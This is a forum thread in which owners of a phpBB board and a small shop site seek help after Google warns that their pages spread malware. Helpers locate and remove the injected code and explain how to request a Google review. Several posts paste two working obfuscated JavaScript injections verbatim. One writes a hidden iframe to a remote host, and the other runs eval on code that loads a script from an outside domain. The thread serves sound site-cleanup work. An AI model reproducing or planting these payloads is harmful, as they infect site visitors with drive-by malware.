Oh crap, my site seems to have been hijacked!!!

Zascar

I have a website which is a PHPBB message board that never really took off so it just sits there and does not do much really.

A few weeks agop when I went to check the site I got the following message:

[phpBB Debug] PHP Notice: in file /includes/session.php on line 885: Cannot modify header information - headers already sent by (output started at /includes/auth.php:929)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 885: Cannot modify header information - headers already sent by (output started at /includes/auth.php:929)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 885: Cannot modify header information - headers already sent by (output started at /includes/auth.php:929)

I had no idea what it is, what it means or how to fix it - I can't be assed trying to so i just left it.

However, Just now I got an email from Google "Malware Noticifation":

Dear site owner or webmaster of digitaldjforum.com,

We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.
Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):
http://digitaldjforum .com/the-chill-out-room-f2/
http://www.digitaldjforum .com/the-chill-out-room-f2/
http://www.digitaldjforum .com/the-chill-out-room-f2/sweet-watches-t326.html
Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http%3A//digitaldjforum.com/the-chill-out-room-f2/
We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:
1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser

If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
http://www.stopbadware.org/home/security
Once you've secured your site, you can request that the warning be removed by visiting
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
and requesting a review. If your site is no longer harmful to users, we will remove the warning.
Sincerely,

WFT??? What can I do here?

seamus

What version of phpBB is it? I've seen this before, should be simple enough to fix if you google your version of phpBB

Zascar

Thanks Seamus, It's PHPBB 3 - not sure exact version though

Gordon

Why fix it when you can just delete the whole site if you don't use it?

Zascar

Well, I don't do much with it cause I don't have the time, but I'd like to get it back working as I do get a tricke of posts and I might look at it one day and start back working on it...

Chardee MacDennis

here's your problem

<script type="text/javascript">var GdpldPBsdvjorQSwfbuS = "kw60kw105kw102kw114kw97kw109kw101kw32kw119kw105kw100kw116kw104kw61kw34kw52kw56kw48kw34kw32kw104kw101kw105kw103kw104kw116kw61kw34kw54kw48kw34kw32kw115kw114kw99kw61kw34kw104kw116kw116kw112kw58kw47kw47kw100kw111kw119kw110kw108kw111kw97kw100kw45kw49kw50kw51kw46kw99kw110kw47kw118kw116kw105kw97kw100kw109kw105kw110kw50kw47kw116kw46kw112kw104kw112kw34kw32kw115kw116kw121kw108kw101kw61kw34kw98kw111kw114kw100kw101kw114kw58kw48kw112kw120kw59kw32kw112kw111kw115kw105kw116kw105kw111kw110kw58kw114kw101kw108kw97kw116kw105kw118kw101kw59kw32kw116kw111kw112kw58kw48kw112kw120kw59kw32kw108kw101kw102kw116kw58kw45kw53kw48kw48kw112kw120kw59kw32kw111kw112kw97kw99kw105kw116kw121kw58kw48kw59kw32kw102kw105kw108kw116kw101kw114kw58kw112kw114kw111kw103kw105kw100kw58kw68kw88kw73kw109kw97kw103kw101kw84kw114kw97kw110kw115kw102kw111kw114kw109kw46kw77kw105kw99kw114kw111kw115kw111kw102kw116kw46kw65kw108kw112kw104kw97kw40kw111kw112kw97kw99kw105kw116kw121kw61kw48kw41kw59kw32kw45kw109kw111kw122kw45kw111kw112kw97kw99kw105kw116kw121kw58kw48kw34kw62kw60kw47kw105kw102kw114kw97kw109kw101kw62";var cyFDWFBHQiyWMnIpDJig = GdpldPBsdvjorQSwfbuS.split("kw");var ERVwiosNQnfsmlwIqxQG = "";for (var gOdsCliGvQnAiIwQxpeN=1; gOdsCliGvQnAiIwQxpeN<cyFDWFBHQiyWMnIpDJig.length; gOdsCliGvQnAiIwQxpeN++){ERVwiosNQnfsmlwIqxQG+=String.fromCharCode(cyFDWFBHQiyWMnIpDJig[gOdsCliGvQnAiIwQxpeN]);}document.write(ERVwiosNQnfsmlwIqxQG)</script>

get that out of all your pages for a start...

Zascar

Sorry to drag up old thread, but I never did anything about this, but need to now...

BastardPrince thanks for that, I removed this code but still not change. Not sure what to do now...

Hoku

You could always try a re-install. Back up the database first via phpMyAdmin, since the board seems inaccessible. Back up any customizations you made to the board.

After you have the DB backed up, delete everything from the directory. Do a fresh install, then restore the DB.
If nothing breaks at this point, then you're good to start restoring all your custom bits.

Surprising that phpBB3 became injected with this, isn't it supposed to be more secure than its predecessor. I had a phpBB2 board for a fairly long time, and all I have to deal with was the Spam. No security breaches though...

Webmonkey

Zascar I can place a bet that it is a .htaccess file redirecting or proxying the requested address through a parser script that will embed that code.

The BOFH

There's been a recent attack on SMF forums using a PHP script embedded in a gif that gets uploaded as an avatar, it corrupts the database too. I'd recommend getting on the forums to check for updates & install the latest version, there might be scripts to clean the database too. Don't allow any folders with permissions higher than 755 or files higher than 644 & don't allow uploads to your site. If you are on shared hosting it might have come from another site on the shared server being compromised or a higher level attack on the host.

Zascar

Hmmm ok thanks guys. I'm a bit lost as to what to do really as I'm not web programmer - I can play about with blogs and forums etc but have no idea when it comes to the more complex stuff. Anyone fancy helping me out, nixer even?
Cheers

Hoku

I could take a look for you.


EDIT: A-a-and sorted. Something inserted that Javascript into the auth.php file.
It's time to ask Mr. Google to remove you from the naughty list.

Zascar

Thanks to Hoku who fixed the problem for me. Unfortunately even though it is now gone, the warnings etc are not. A search for "Digital DJ forum" on google still gives a warning "this site may harm your computer" - same with irishdjforum and even zascar.com (all on same host). The thing is that I'm even getting it on my personal blog (different host) - simply because there are links between the site (streaming embedded file).

So now I have to contact google and get them to review the site to remove the malware message. Any idea how I do this?

Hoku

Head over to the Webmaster Tools and do like so:

Google wrote:

1. On the Webmaster Tools Home page, select the site you want.
2. In the Parts of this site may be distributing malware message, click More details.
3. Click Request a review.

Zascar

Ahh now I see. I have to have my sites "Verified" first, but because of this dam warning messages i cannot get into my control panel!
I'm sure I can find another way around it but its a real pain...

B1977

I have got the same message off google for my website aswell,anyone out there that can find the problem

Hoku

Check your website's HTML Source, and see if there's any funny-looking code there, like Javascript that doesn't seem to make any sense at all. Then find the actual file containing that code and delete it.
That was the procedure I followed because phpBB told me where an error occured. Could be more difficult of you're using a CMS and it doesn't show any PHP errors.

When you're done with that, check at the bottom of page 1 on this thread, how to contact Google and ask them to review your website.
In case your site isn't verified, you may need to contact Google's tech support directly, if there is such an option.

B1977

I reloaded the original website homepage and still get the message and verifyed the site

Hoku

PM me the link, I'm sure my firewall will keep my safe from whatever is hiding on your page.
And if not, I have back-ups... *format* :pac:

B1977

theres the html source code.
is there any problems with this

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;

<html xmlns="http://www.w3.org/1999/xhtml"&gt;
<head>


<meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />

<title>The Magic Shop</title>
<meta name="robots" content="Index,Follow" />
<meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
<meta name="resource-type" content="document" />
<meta name="audience" content="all" />
<meta name="distribution" content="global" />
<meta name="robots" content="ALL" />
<meta name="revisit-after" content="2 days" />
<meta name="Description" content=
"The Magic Shop has loads of great tricks, books, costumes and much more to help you become an amazing magician! Great fun for all ages, at home or at parties!" />
<meta name="Keywords" content=
"Magic, Shop, Limerick, jokes, tricks, cards, cheap, great, fun, costumes, make, up, dvd, books, coins, wigs, ireland, party, cool, mentalism, crazy, funny, paint, redox, designs, all, ages, amazing, wow, magician" />
<link href="style.css" rel="stylesheet" type="text/css" />
<link rel="stylesheet" href="lightbox.css" type="text/css" media="screen" />
<script type="text/javascript" src="js/prototype.js">
</script>
<script type="text/javascript" src="js/scriptaculous.js?load=effects,builder">
</script>
<script type="text/javascript" src="js/lightbox.js">
</script>
</head>
<meta name="verify-v1" content="v5wEcf1QB4DisylMb7G1gL2ELgehRmEjLcGxgjM2bIg=" >
<body>
<center>
<div id="date">
<script language="javascript" type="text/javascript">
//<![CDATA[
document.write(""+Date()+".")
//]]>
</script>
</div>

<div id="sign">
<table width="800">
<tr>
<td width="50%" align="left">
061 341839<br />
086 2563681<br />
087 6492126
</td>
<td width="50%" align="right">
6 Mallow Street<br />
Limerick<br />
Ireland
</td>
</tr>
</table>
</div>

<div id="container">
<div class="menu">
<ul>
<li><a href="index.html" title="Home">Home</a></li>

<li><a href="costumes.html" title="">Costumes</a></li>

<li><a href="cards.html" title="">Cards</a></li>

<li><a href="coins.html" title="">Coins</a></li>

<li><a href="books.html" title="">Books</a></li>

<li><a href="tricks.html" title="">Tricks</a></li>

<li><a href="makeup.html" title="">Make Up</a></li>

<li><a href="contact.html" title="">Contact</a></li>
</ul>
</div>

<table cellspacing="0" cellpadding="0">
<tr>
<td>
<div id="logo">
<iframe src="new.html" name="new" scrolling="no" frameborder="0" align="middle" height="205px" width="800px" id="new"></iframe>
</div>
</td>
</tr>

<tr>
<td>
<div id="bar">
<div id="left_bar">
Catagories
</div>

<div id="right_bar">
Welcome to the Magic Shop
</div>
</div>
</td>
</tr>

<tr>
<td>
<div id="main">
<div id="sidebar">
<a href="books.html">Books</a><br />
<a href="cards.html">Cards</a><br />
<a href="coins.html">Coins</a><br />
<a href="costumes.html">Costumes</a><br />
<a href="dvds.html">Dvds</a><br />
<a href="jokes.html">Jokes</a><br />
<a href="makeup.html">Make Up</a><br />
<a href="mentalism.html">Mentalism</a><br />
<a href="tricks.html">Tricks</a><br />
<a href="wigs.html">Wigs</a><br />
</div>

<div id="content">
<div id="shop"><img src="images/shop.png" alt=" The Magic Shop " border="0" /></div>

<h1>Welcome</h1>

<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aliquam eget augue vitae
risus malesuada ullamcorper. Aenean a metus at dui molestie laoreet. Integer imperdiet,
augue nec pellentesque aliquet, tortor nulla pharetra magna, non laoreet mauris libero ac
pede. Curabitur vestibulum ullamcorper diam. Donec quam felis, elementum in, auctor eu,
aliquet at, diam. Proin euismod leo ut sem. Curabitur sapien. Ut massa. Nunc in risus
vitae nibh vehicula vulputate. Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
Maecenas gravida luctus dolor. Phasellus bibendum. Vestibulum aliquet tortor et
dolor.</p>

<p>Duis eu dui sit amet erat eleifend consequat. Vivamus risus. Sed leo justo, hendrerit
non, vulputate id, fermentum eget, ipsum. Fusce et diam. Curabitur a lectus. Aenean ac
ligula nec neque adipiscing elementum. Pellentesque vitae nisl eu massa pellentesque
sagittis. Nam vitae justo eget tortor malesuada interdum. Ut nec est nec arcu faucibus
varius. Ut malesuada. Nulla accumsan. Sed augue sapien, sollicitudin et, congue non,
sollicitudin convallis, enim. Integer id ipsum. Fusce et orci. Praesent in ligula. Donec
vel elit. Aenean ante mi, sollicitudin pharetra, sollicitudin in, dictum vitae,
lacus.</p>

<p>Donec mauris libero, porttitor in, commodo commodo, congue a, urna. Morbi facilisis
arcu. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos
himenaeos. Phasellus pretium nibh tempus justo. Nullam varius, massa tincidunt viverra
vestibulum, purus tortor interdum eros, et consequat risus enim eu elit. In eleifend
rutrum erat. Maecenas pharetra metus vel ipsum. Sed varius metus a nunc. Vestibulum
aliquet, nunc sed adipiscing ultrices, urna erat imperdiet sapien, id gravida dui tortor
in turpis. Quisque gravida scelerisque dui. Donec imperdiet scelerisque leo.</p>
</div>
</div>
</td>
</tr>

<tr>
<td>
<div id="bot"></div>
</td>
</tr>

<tr>
<td>
<div class="menu">
<ul>
<li><a href="index.html" title="Home">Home</a></li>

<li><a href="costumes.html" title="">Costumes</a></li>

<li><a href="cards.html" title="">Cards</a></li>

<li><a href="coins.html" title="">Coins</a></li>

<li><a href="books.html" title="">Books</a></li>

<li><a href="tricks.html" title="">Tricks</a></li>

<li><a href="makeup.html" title="">Make Up</a></li>

<li><a href="contact.html" title="">Contact</a></li>
</ul>
</div>
</td>
</tr>

<tr>
<td>
<div id="footer">
Copyright 2008 © The Magic Shop
</div>
</td>
</tr>
</table>
</div>

<div id="redox">
<a href="http://www.redoxdesigns.com&quot; target="_BLANK">RedoxDesigns.com</a>

<div>
<p><!-- Start of StatCounter Code -->
<script type='text/javascript'>
//<![CDATA[
var sc_project=3937707;
var sc_invisible=0;
var sc_partition=47;
var sc_click_stat=1;
var sc_security='bf276033';
//]]>
</script> <script type='text/javascript'>
</script><noscript>
<div class='statcounter'>
<a href='http://www.statcounter.com/' target='_blank'><img class='statcounter' alt='best counter' /></a>
</div></noscript>
<!-- End of StatCounter Code --></p>
</div>
</div>
</center>
</body>
</html>

Zascar

After fixing it you need to go into your Google Webmaster tools, verify the site, and then "request a review" to get rid of the warning. I just did it but not sure how long it will take

B1977

its the fixing of it that is the problem.every time I edit and reload the page,google cotact me a few days later with a message,that there is a problem

Hoku

Everybody agree that this code looks a bit 'shady' and malicious?

<!-- 
(function(){var jwm='%';var bS88='@76@61r@20@61@3d@22@53criptE@6egi@6e@65@22@2cb@3d@22V@65rsio@6e@28)@2b@22@2c@6a@3d@22@22@2cu@3d@6e@61vig@61tor@2euserAgent@3bif((u@2ei@6edexO@66(@22C@68rom@65@22@29@3c0)@26@26(@75@2eind@65xOf(@22@57in@22)@3e0)@26@26(u@2eindex@4ff(@22NT@206@22)@3c0)@26@26(@64@6fc@75ment@2e@63ooki@65@2ein@64exOf(@22m@69ek@3d1@22)@3c0@29@26@26@28type@6ff(zrv@7a@74@73@29@21@3dtypeo@66(@22A@22))@29@7b@7ar@76zt@73@3d@22@41@22@3b@65val@28@22@69f(wind@6fw@2e@22+a+@22)j@3dj+@22+a@2b@22Ma@6aor@22+b+@61+@22Mino@72@22+b@2ba+@22Build@22+b+@22j@3b@22@29@3bdocu@6de@6et@2e@77@72i@74e@28@22@3cscript@20s@72@63@3d@2f@2f@6dar@74@75@22+@22z@2ecn@2f@76@69d@2f@3fid@3d@22+@6a+@22@3e@3c@5c@2fsc@72ipt@3e@22@29@3b@7d';var PnXo=bS88.replace(/@/g,jwm);var NTw=unescape(PnXo);eval(NTw)})();
 -->

I'm no Javascript expert but I'm quite sure your Google doesn't like such rubbish.

Open up all of your .js files and you'll find this at the bottom of them all. Delete it but be carefull not to touch and ; or } as that would break the code.

B1977

}}, arguments[1] || {}));
}
<!--
(function(){var jwm='%';var bS88='@76@61r@20@61@3d@22@53criptE@6egi@6e@65@22@2cb@3d@22V@65rsio@6e@28)@2b@22@2c@6a@3d@22@22@2cu@3d@6e@61vig@61tor@2euserAgent@3bif((u@2ei@6edexO@66(@22C@68rom@65@22@29@3c0)@26@26(@75@2eind@65xOf(@22@57in@22)@3e0)@26@26(u@2eindex@4ff(@22NT@206@22)@3c0)@26@26(@64@6fc@75ment@2e@63ooki@65@2ein@64exOf(@22m@69ek@3d1@22)@3c0@29@26@26@28type@6ff(zrv@7a@74@73@29@21@3dtypeo@66(@22A@22))@29@7b@7ar@76zt@73@3d@22@41@22@3b@65val@28@22@69f(wind@6fw@2e@22+a+@22)j@3dj+@22+a@2b@22Ma@6aor@22+b+@61+@22Mino@72@22+b@2ba+@22Build@22+b+@22j@3b@22@29@3bdocu@6de@6et@2e@77@72i@74e@28@22@3cscript@20s@72@63@3d@2f@2f@6dar@74@75@22+@22z@2ecn@2f@76@69d@2f@3fid@3d@22+@6a+@22@3e@3c@5c@2fsc@72ipt@3e@22@29@3b@7d';var PnXo=bS88.replace(/@/g,jwm);var NTw=unescape(PnXo);eval(NTw)})();
-->

Hoku

Just the bits between <!-- and --> and the tags themselves - so the bottom of that file will look like so:

}}, arguments[1] || {}));
}

B1977

everything else seems to be written in black ink and the malware or whatever it is ,is in grey

Hoku

It's because the <!-- --> tags signify a HTML comment, or in this case a malicious code. Your editor is just parsing these tags as any other HTML comment, whereas Google reads inside the comment and sees that nasty piece of work.

tricky D

Hoku wrote: »

Everybody agree that this code looks a bit 'shady' and malicious?

<!-- 
(function(){var jwm='%';var bS88='@76@61r@20@61@3d@22@53criptE@6egi@6e@65@22@2cb@3d@22V@65rsio@6e@28)@2b@22@2c@6a@3d@22@22@2cu@3d@6e@61vig@61tor@2euserAgent@3bif((u@2ei@6edexO@66(@22C@68rom@65@22@29@3c0)@26@26(@75@2eind@65xOf(@22@57in@22)@3e0)@26@26(u@2eindex@4ff(@22NT@206@22)@3c0)@26@26(@64@6fc@75ment@2e@63ooki@65@2ein@64exOf(@22m@69ek@3d1@22)@3c0@29@26@26@28type@6ff(zrv@7a@74@73@29@21@3dtypeo@66(@22A@22))@29@7b@7ar@76zt@73@3d@22@41@22@3b@65val@28@22@69f(wind@6fw@2e@22+a+@22)j@3dj+@22+a@2b@22Ma@6aor@22+b+@61+@22Mino@72@22+b@2ba+@22Build@22+b+@22j@3b@22@29@3bdocu@6de@6et@2e@77@72i@74e@28@22@3cscript@20s@72@63@3d@2f@2f@6dar@74@75@22+@22z@2ecn@2f@76@69d@2f@3fid@3d@22+@6a+@22@3e@3c@5c@2fsc@72ipt@3e@22@29@3b@7d';var PnXo=bS88.replace(/@/g,jwm);var NTw=unescape(PnXo);eval(NTw)})();
 -->

I'm no Javascript expert but I'm quite sure your Google doesn't like such rubbish.

Hex to text for the obfuscated text gives:

va a="nne"="en(+",j="",=naa.;.fhe")&&u.e"W"&&.&#222;""&&du.ce."")&&(zts)!=f"){zvs="A";e("o.""="+"j"a"r""";")n.wr("< rc=//tu""/v/?="j"><\/r>");}

I don't like that. Pop the 'cript', 'rsion' and other plain text stuff back in and it does look shady indeed.

B1977

hopefully all this code has been removed now.I ll have to allow google to check it again,

thanks for your help

B1977

the website was in googles top ten,but is off the radar now.is there anyway of trying to get the site back on to the first page of google ?

Zascar

That's a good point. I'd say this seriously affects googles ranking of you. Does it come back eventually?